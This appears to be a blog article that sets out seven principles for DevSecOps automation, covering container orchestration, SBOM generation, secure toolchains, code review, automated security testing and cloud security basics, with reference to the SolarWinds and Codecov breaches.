DevSecOps automation is one of the most significant benefits of shifting security left in your development process. The aftermath of the SolarWinds and Codecov breaches should be at the top of mind if your organization is contemplating a move to DevSecOps.
In order to ensure process efficiencies, DevSecOps relies on automation, which enables developers, infrastructure, and information security teams to focus on delivering value instead of making mistakes or repeating routine tasks. Let's look at 7 DevSecOps principals that guide automation.
1. Acknowledge that DevSecOps Automation drives DevOps Transformation
Pivoting your DevOps processes to DevSecOps is a transformative effort. You’re doing more than just automating some sundry manual tasks. Being strategic with automation means you can change the way that your teams work, for the better. It frees developers and sysadmins to do more strategic or billable work that was forever on the backlog because normal development and operations tasks consumed their working hours.
Project managers should include the potential impact of automation in their technology and staffing plans. While automation makes business sense, such benefits may not translate to an already pandemic stressed development team nearing two years of enforced remote work.
2. Implement Orchestration for Containers
Implement Kubernetes or another container orchestration solution to apply, provision, and manage repeatable security best practices through container orchestration. Approach your move to container orchestration systematically by starting small with one project, take your lessons learned, and expand orchestration throughout your cloud-native projects where it makes technology and business sense.
3. Institute an SBOM to enhance your Application Inventory
The SolarWinds and Codecov breaches followed by President Biden’s Executive Order on Improving the Nation’s Cybersecurity Executive Order testifies to the growing importance of the software bill of materials (SBOM) in cybersecurity.
Bringing SBOM generation into your DevSecOps pipeline using automated scanning tools gives you the best picture of proprietary and open source software (OSS) dependencies in the software your teams are developing. You can also track SBOM drift if you have the right tools and processes in place. This visibility through your development lifecycle can show where your software gains additional components and dependencies -- malicious or otherwise.
4. Build and Manage Secure Dev Environments & Toolchains
To support DevSecOps automation, future development environments require integrating security standards and guidelines through an integrated development environment (IDE). Make the guidelines actionable and relevant through the use of containers or code examples. Back your policies with a developer onboarding program that trains new employees in your environments, tools, and processes. Offer a refresher course and ongoing training to your developers beyond the onboarding training.
Elevate your toolchains to the same level as other endpoints in your organization’s enterprise to protect against “man in the middle” and other potential exploits. Securing your DevSecOps toolchain needs to be a continuing focus with participation from your developers, operations, and cybersecurity teams.
5. Design Efficient Code Review Processes
Define the code review process to make code review more efficient and consistent saving developers and stakeholders valuable time. Be prepared to iterate with your developers, project management, and stakeholders to get to the level of efficiency they require. You do this by taking in lessons learned, documenting your code review processes, and keep a feedback mechanism in place to foster continuous improvement. An example, feedback mechanism could be a dedicated Slack channel
6. Automate Security Testing
Analyze the current state of your security testing as part of your move to DevSecOps automation and look for opportunities to automate some of those tests in conjunction with your in-place functional testing as part of instituting automated regression testing.
Revisit QA team roles during security testing. Then adjust your processes to place QA team members freed up via security test automation to more strategic tasks. An example of more strategic work is involving them deeper in response to QA issue remediation along with their counterparts on the development team.
7. Stick to (and Reinforce) Cloud Security Basics
Tried and true solid cloud security basics are at the heart of DevSecOps automation. Your cloud security team needs to work with your development and operations teams to apply the appropriate cloud security controls to your DevSecOps environments. Some examples might include AWS Security Hub, Microsoft Azure Monitor, and Google Cloud Policy Intelligence.
Success with DevSecOps automation happens when you first acknowledge the role of automation in your digital transformation and then add automation to your existing DevSecOps processes. All the while, you want to work with your developers, system administrators, and QA team to include them in the implementation of automation moving forward. DevSecOps truly is a team sport, and when approached with intention and purpose can reap great rewards for the team.